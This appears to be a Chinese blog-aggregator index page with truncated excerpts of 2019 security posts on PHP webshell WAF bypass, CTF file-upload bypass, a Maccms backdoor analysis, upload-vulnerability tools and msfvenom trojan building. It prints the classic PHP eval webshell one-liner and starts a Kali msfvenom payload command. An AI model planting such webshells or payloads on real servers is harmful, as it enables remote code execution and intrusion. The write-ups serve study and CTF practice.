PHP-WebShell-Bypass-WAF PHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码: <?php eval($_GET['test']); ?> <?php eval($_POST['test']); ?> WebShell 的输入点在$_GET 和$ ...
分类:
Web程序 时间:
2019-10-20 11:10:22
阅读次数:
121
今天看到的文章,特地记录,非常的好,关于取反操作,之前记录过一篇无字幕webshell,suctf中也有类似题目 ...
分类:
Web程序 时间:
2019-10-19 23:28:08
阅读次数:
506
看起来是个上传题,提示只能上传图片,这时候就需要拿出我们的一句话来了。 首先来试试水,上传一个一句话木马,使用burp抓包,修改content-type为image/jpeg 上传失败,可能是对文件进行了过滤,让我们来绕过试一下 试了很多招数都不行,只能看下大佬们的wp 原来这个题是对文件类型进行了 ...
分类:
系统相关 时间:
2019-10-19 11:23:35
阅读次数:
133
Maccms后门分析 maccms网站基于php+mysql的系统,易用性、功能良好等优点,用途范围广 打开源码,extend\Qcloud\Sms\Sms.php、extend\upyun\src\Upyun\Api\Format.php是两个后门(Sms.php和Format.php是后门木马 ...
分类:
系统相关 时间:
2019-10-16 19:35:35
阅读次数:
307
韩舒学姐(相当温柔)今天给我们讲解了文件上传漏洞,以及Anrwsord和Cknife等工具的使用。文件上传漏洞上传的文件不进行限制,有可能会被利用于上传可执行文件、脚本到服务器上,并且通过脚本文件可以获得执行服务器端命令的能力木马根据语言分类,有PHP、ASP、JSP、ASP.NET等不同语言下的木... ...
分类:
Web程序 时间:
2019-10-12 01:36:51
阅读次数:
175
韩舒学姐(相当温柔)今天给我们讲解了文件上传漏洞,以及Anrwsord和Cknife等工具的使用。文件上传漏洞上传的文件不进行限制,有可能会被利用于上传可执行文件、脚本到服务器上,并且通过脚本文件可以获得执行服务器端命令的能力木马根据语言分类,有PHP、ASP、JSP、ASP.NET等不同语言下的木... ...
分类:
Web程序 时间:
2019-10-11 23:23:21
阅读次数:
264
- 内置模块(标准库)
- 序列化
- hashlib
- collections
- 软件开发规范 ...
分类:
编程语言 时间:
2019-10-05 12:31:21
阅读次数:
117
漏洞复现:使用Kali制作木马程序 攻击机:Kali2019 靶机:Win7 64位 攻击步骤: 1.打开Kali2019和Win7 64位虚拟机,确定IP地址在一个网段 2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下 命令:msfvenom -p windows/met ...
分类:
其他好文 时间:
2019-09-30 12:54:34
阅读次数:
311
控制端:运行在攻击者的电脑中,负责控制其他肉鸡 被控制端:需要生成,与你行在肉鸡上,木马病毒 两端需要数据互通 打开远见,在系统设置里修改密码后重启 然后打开hfs 右键,选择添加文件,将consys21.dll文件添加进来,然后右键该文件,选择复制url 先浏览器打开看一下能否访问 在远见中点击服 ...
分类:
其他好文 时间:
2019-09-28 14:37:08
阅读次数:
117
如果发现一个站点用的是wordpress管理系统的话, 可以试试默认的后台地址:/wp-admin/ 访问后自动跳转置 后台登录界面 用户名收集 :/wp-admin/?author=1 依次访问/author=1 ,2,3,4,5 …. 直到结束 进入后台再尝试写入一句话木马 利用kali中的工具 ...
分类:
其他好文 时间:
2019-09-22 19:41:35
阅读次数:
101
